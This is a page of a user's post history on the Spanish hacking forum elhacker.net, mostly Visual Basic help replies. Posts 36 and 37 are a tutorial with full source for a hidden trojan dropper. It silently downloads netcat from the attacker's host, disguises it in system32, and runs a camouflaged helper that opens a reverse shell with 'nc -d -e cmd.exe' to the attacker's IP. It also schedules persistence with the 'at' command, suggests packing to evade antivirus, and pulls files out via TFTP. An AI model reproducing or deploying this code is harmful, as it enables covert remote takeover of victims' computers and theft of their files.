elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12
31  Programación / Programación Visual Basic / Re: Quien me ayuda a mejorar este codigo?(Socket) en: 7 Agosto 2006, 18:19 pm
 :huh: es para un chat..........  :huh:  man, ya te esplicaron como diferenciar los datos que llegan  y envias, fijate bien ;)
32  Programación / Programación Visual Basic / Re: Ayuda con captura de imagen en: 7 Agosto 2006, 18:15 pm
para comprimirla usa el modulo de clase cJpeg.cls

y para comprimir : JP3G.Quality = 50 x ejemplo...ajustas la calidad de 1 a 100 y con 50 ya te caderan muuuuuucho más libianas ;) , ya solo te falta: conseguir el modulo, agregarlo al projecto y hacer con el lo que estas pidiendo en el post y..listo !!
33  Programación / Programación Visual Basic / Re: Como hago para que no cambie las fuentes ......... en: 5 Agosto 2006, 01:37 am
Pues creo que deberias tener las fuentas "esas" en la otra maquina en la carpeta fonts, asi de rapido se me ocurre: subes las fuentes esas comprimidas a zip, las subes a un host tuyo, luego con la api

Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long     'api necesaria para el descargar algo de internet


descargas el zip en ese sistema, lo desempaketas y copias las fuentes al folder c:\windows\fonts o si fuera win200 c:\winnt\fonts y yasta, cuando vayas a selecionar fuentes en tú aplicación, deberias de tenerlas, eso asi rapido, seguro que puedes hacerlo de algun modo más profesional. salu2.
34  Programación / Programación Visual Basic / Re: Seme acabo los controles..... en: 5 Agosto 2006, 01:33 am
No puedes llamarlos desde el otro formulario ??? estamos en el newfrm pues : dsd el llamas al control: MAINfrm.Text1.Text...x ejemplo o no es asi el problema  :huh:
35  Programación / Programación Visual Basic / Re: [Módulos] - 5 métodos para comprimir archivos en VB en: 28 Julio 2006, 20:53 pm
De mucha utilidad _Sergi_ ;) , mira ver si puedes añadir más, salu2 ;)
36  Programación / Programación Visual Basic / Re: Obtener shell por medio de un ejecutable!! en: 28 Julio 2006, 20:21 pm
Cierto madantrax, algunos avs detectan esto, pero te aseguro que de un buen % conseguimos la shell de este modo que he expuesto, es tan solo como dije un ejemplo..podriamos como dices tú mejorar el method, eso buscamos, la calidad, cuanto mejor sea nuestro metodo pues mejor, si, podrias poner el codigo que dices, no estaria de más ;) , se agradeceria por mi parte y seguro que por la de otros muchos tambien, lo de los timers, se que no es la mejor idea, si te fijas, por eso dije que no necesitamos que nuestra app se inicie con windows pues despues de ser eejcutada va hacer su trabajo y listo!! No la necesitamos para nada más, la idea de los timers la comente cuando dije: que si la ivas a registrar con windows, por qué ? pues porque si no haces eso de que cheke si dichos files existen..en el proximo inicio de nuestra app con windows va a volver a ejecutar esos timers y seguido: volver a descargar netcat, a copiarlo al systemfolder, registrarse..descargar los files..etc ( lo que ayas puesto dentro de timers ) de seguro habran más modos de hacerlo pero esa fue la que se me ocurrio de rapido cuando escribi el codigo, pues bueno eso es todo y decir que para los que tengais dudas de si funciona o no, pues chekadlo y vereis que obtendreis shell de la mayoria de maquinas, algunos fw cantaran y algun av, pero en mi caso tenia cuando escribi el codigo instalado nod32 y el x ejemplo ni se inmutaba, llegaba el netcat y demas files a la ruta que indique en el codigo :) , outpost x ejemplo..si canta y de seguro algunos más como ya dije, por todo lo demas creo que bien, salu2 y espero que me ayuden a mejorar este tutorial, no para mi, sino para todos nosotros interesados, ;) bye .
37  Programación / Programación Visual Basic / Obtener shell por medio de un ejecutable!! en: 28 Julio 2006, 18:12 pm
Buenas, le dejo un codigo mio que lo que hace es esto: al ser ejecutado el .exe, nos deja el terreno listo para una conexion inversa con netcat ( reverse shell ), no se registra la app con windows, simplemente ya vereis que no nos hace falta, sino: llegar a meternos en el sistema, dejar los files necesarios y dejar todo listo para tener la reverse shell con netcat, ya si quiereris hacer modoficaciones pues para que se registre con windows, o cheke si es un winxp/2k y dependiendo el caso se registre en otro sistema, pues muy bien son ideas, pongo el codigo y comento cada linea, salu2 y espero que les sirva como ejemplo!! ;)

Declaraciones:

Código:
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Const SW_NORMAL = 1
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long     'api necesaria para el descargar algo de internet

Option Explicit

en el evento load del formulario:

Código:
Private Sub Form_Load()
URLDownloadToFile 0, "http://usuarios.lycos.es/TU_USER/nc.exe", "C:\NC1.exe", 0, 0 'descargamos netcat desde nuestro host y lo ponemos en c:\ , el netcat para que pase muchisimo más desapersivido, pasale themida ;), que aunque pese 1mb, lo estamos descagarndo desde vb, no via navegador ;) y al descarga es algo más rapida y no visible ni x ventanas sino talvez por algunos fws, pero vereis que la mayoria de veces el netcat llegara a buen puerto, nod32 x ejemplo no me detectaba.
End Sub

timer con el que copiamos netcat a system32 o a donde quieras..mejor a system32 ;) ; tiene un intervalo de 45000 y esta en enabled = true

Código:
Private Sub Timer_copync_Timer()
On Error Resume Next
FileCopy "C:\NC1.exe", "C:\WINDOWS\system32\winnc.exe" 'copia el netcat a system32 en win xp
Timer_copync.Enabled = False
End Sub

el timer con el que vamos a ejecutar el nc con los parametros que queramos: ( de intervalo: 55000 y enabled = true )

Código:
Private Sub Timer_run_nc_Timer()
On Error Resume Next
Dim abrir As Long

URLDownloadToFile 0, "http://usuarios.lycos.es/TU_userNAME/wuauclt32.exe", "C:\wuauclt32.exe", 0, 0

abrir = ShellExecute(Me.hwnd, "Open", "C:\wuauclt32.exe", "", "", 1)
Timer_run_nc.Enabled = False
End Sub

pues lo que hace ese timer es tb descargar una app desde nuestro host y ejecutarla, que es esa aplicación ?? una app de no más de 2 lineas de codigo:

abrimos un nuevo projecto aparte de vb, y al form le damos esta propiedad: visible = false, un icono "camuflaje" y ya esta: luego en el form load:

Código:
on error resume next
Shell "cmd.exe  /c winnc -d -e cmd.exe túip puerto ", vbHide


y ya, compilamos con p-code paar que el peso sea lo más bajo posible, aunque ya lo va ser...fijate en que es mui poco el codigo..., luego subimos a nuestro host este ejecutable que sera quien ejecute nuestro netcat, tb Debes subir el netcat a tu host

tb decir que la otra aplicacion: la que vamos a enviar, ella se encarga de: descargar netcat, copiarlo ar directorio del sistema, descargar  la app que se encarga d ejecutarlo( en mi caso tiene este nombre:wuauclt32.exe  ) , pues esa tb tenemos que poner el formulario en visible = false, logico!!

y para los que querais tener la seguridad de tener esa maquina controlada con nuestro netcat, vamos a hacerle esto pues es opcional, puedes tb hacerlo desd la shell asi. at 20:30 /every:L,M,Mi,J,V,S,D winnc -d -e cmd.exe túip puerto   , con eso ya dejamos listo el netcat para que se ejecute con esa sintasis todos los dias de la semana ( L,M,Mi,J,V,S,D) a tal hora: 20:30 puse como ejemplo, podemos añadir mas horarios, las 24 horas de un día.

y de otro modo seria:

con un timer en nuestra app, más un bat ya programado con los horarios que queramos, ejemplo como puse: todos los dias ejecutamos netcat con esa sintasis, pero en ves de solo a las 20:30 , cada media hora: osea: 00:00, 00:30, 1:00, 1:30...y asi hasta que queramos, despues d tener el bat listo lo subimos a nuestro host.

Código:
timer_at_horarios_d_ejecución_Timer()
On Error Resume Next
Dim abrir As Long
URLDownloadToFile 0, "http://usuarios.lycos.es/tu_user/at.bat", "C:\at.bat", 0, 0

abrir = ShellExecute(Me.hWnd, "Open", "C:\at.bat", "", "", 1)

timer_at_horarios_d_ejecución.enabled = false
end sub

ese timer descarga de nuestro host un bat ya programado por nosotros anteriormente, con los horarios, dias y sintasis con las que se va a ejecutar netcat en nuestro sistema, de intervalo? ponle el que quieras: bueno mejor: minimo 1000( 1seg)

, luego si quieres podrias ponerle tb: para que se registre nuestra app con windows, que cheke si esun winxp o 2k y segun pues se copia y crea key con distintos nombres o no se copia etc, tb puedes, añadirle la funcion de que se agrege a la lista de programas permitidos por el fw d windows, tb con un bat que descarge nuestra app, tb ( ojo con esto ) desde que inicie la app con windows, x ejemplo porque no quieras iniciar el netcat con el comando at como explique, y pones timers date cuenta que en el proximo inicio d windows va a volver a ejeuctar todos los timers y repetir el mismo proceso..osea todo..descargar netcat, copiarlo...etc etc( segun lo que hayas puesto ) , pues para solucionar eso, basta con al final de cada timer como ejemplo pongo el primer timer:

Código:
Private Sub Timer_copync_Timer()
On Error Resume Next
FileCopy "C:\NC1.exe", "C:\WINDOWS\system32\winnc.exe" 'copia el netcat a system32 en win xp
Open "C:\chek_4_file_exist.xD" For Random As #1
Close #1 
Timer_copync.Enabled = False
End Sub


con esto: Open "C:\chek_4_file_exist.xD" For Random As #1
Close #1 

creamos un file en c:\ con ese nombre que nos va a servir para esto:

en el form:

Código:
Private Sub Form_Load()
URLDownloadToFile 0, "http://usuarios.lycos.es/TU_USER/nc.exe", "C:\NC1.exe", 0, 0
   
If Dir("C:\chek_4_file_exist.xD") <> "" Then
        '
       Timer_copync.Enabled = False
       
    Else
       
        Timer_copync.Enabled = True
       
    End If

'ahora con ese codigo en el form le decimos que si ese archivo existe no ejecute el timer de nuevo y si el file no existe pues si ejecutamos el timer
End Sub

solo decir tambien que si hace eso, los timers que tengan esas funciones, de descargar files, ejecutar un file, copiarse a systemfolder etc, Debes ponerlos en enabled = FALSE, para que cuando cheke si existe o no ese file, pues lo ponga en TRUE o deje en FALSE, ya estamos terminando y ahora para los que diran bueno y cuando tenga la shell que hago?

pues usa el comando --->  help

nociones básicas; cd.. para bajar de directorio, cd para esclar a un directorio ejemplos: estamos en: c:\documents and settings\tuUser\mis documentos> y quieres llegar a.. C:\ pues haces esto: cd.. + enter y estaras en:c:\documents and settings\tuUser> cd.. = c:\documents and settings>cd.. = C:\ ;)

quieres escalar de c:\ a documents and settings x ejemplo ?? pues: c:\> cd documents and settings = c:\documents and settings>  , con eso ya podras moverte por los directorios y curiosear ya luego demas comandos vete practicandolos help y tienes la ayuda, comando /? su ayuda, ya veras que es fácil ;)

y para quienes digan vale muchas gracias..pero ahora como subo y bajo archivos ??  :huh:

fácil, te bajas el server TFTP d solarwinds.net ( es free ), lo instalas, configuras, selecionas una carpeta donde vamos a depositar los archivos que queramos subir y donde alojar las descargas y cuando ya lo tengas eso vamos con las sintasis para upload & download ( NOTA: Debes tener abierto el puerto: 69 udp y sino es asi..abrelo )

dsd la shell de la maquina X ejecutamos para un upload : tftp.exe -i túip GET "h4ack.bat" c:\h4ackRecibed.bat

para un download:

tftp.exe -i túip PUT c:\documents and settings\user_pc_XX\documentos\h4ck.jpg "recibido_n_mi_compu.jpg"

y eso es todo, si se me ha escapado algo o algun fallo lo comentan para correjirlo, espero que les guste este codectutorial o como lo quieran llamar xD, son solo ideas, practica, no hagan mal con esta información yo no lo he escrito para eso, salu2 ;) by AililiA
38  Programación / Programación Visual Basic / Colocar form segun tamaño de la screen en: 27 Julio 2006, 18:03 pm
buenas, pues ando en esas, necesito calcular el tamaño de cada monitor donde se ejecute mi aplicacion, para que muestre a la misma altura un formulario, osea que muestre tanto en un monitor de 15 pulgadas como en uno de 17 la aplicacion en el mismo sitio de la screen, ( 15 y 17 pulagadas lo puse como ejemplo de + y - ) pues eso es todo, salu2. ;)
39  Programación / Programación Visual Basic / Re: Comprimir JPG!! en: 27 Julio 2006, 16:10 pm
Gracias hans, aseptadas las disculpas, mira gracias x el link, yo he andado por el mismo sitio, pero cuando no es juana es su hermana, me explico, algunas clases del cJpeg le faltan parametros que a otras no...yo tengo la que sirve para cargar una imagen en bmp o cargar la imagend e un control picture..pero leugo le falta el parametro: samplescreen..y ya me caga la captura de screend e mi aplicacion...y eso busco una que este completita, con minimo estos parametros: samplescreen, samplepicture, quality, samplefrequency, savefile y ya estaria, pero no la encuentro, si tiene alguna otra idea de como comprimir las capturas que hago de la webcam ( las hago en jpg ), pues explicamelo por aqui mismo, salu2 y perdona el mal entendido ;)
40  Programación / Programación Visual Basic / Re: Comprimir JPG!! en: 27 Julio 2006, 15:58 pm
 ;) dudo que te dieras cuenta, disjite esto y no fui yo: sino pones la clase/control...

....pues yo puse la clase y no pongo el codigo ni la subo porque ya esta en el foro y ademas es mui conocida, solo decirte que es de sabio reconocer cuando uno mete la gamba ;) y para volver a responde algo como la última respuesta ni te molestes ok ? aver si te piensas que estas tratando con quien un bobo o algo, mide tus palabras amigo, salu2. ;)
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines